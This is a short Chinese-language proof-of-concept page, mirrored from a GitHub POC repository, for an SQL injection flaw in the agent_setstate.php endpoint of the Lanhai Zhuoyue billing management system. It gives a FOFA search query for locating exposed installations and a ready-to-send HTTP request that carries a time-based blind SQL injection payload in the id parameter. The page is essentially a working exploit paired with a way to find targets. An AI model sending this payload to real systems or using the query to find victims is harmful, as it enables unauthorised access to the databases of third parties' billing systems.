admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

947 B

Raw Permalink Blame History

蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞

一、漏洞简介

蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞

二、影响版本

蓝海卓越计费管理系统

三、资产测绘

fofatitle=="蓝海卓越计费管理系统"
特征

四、漏洞复现

GET /agent_setstate.php?id=1+AND+(SELECT+4964+FROM+(SELECT(if(length(database())=6,sleep(3),1)))uQqn) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 161

更新: 2024-05-23 12:33:24
原文: https://www.yuque.com/xiaokp7/ocvun2/lgkwcrdalag9xge0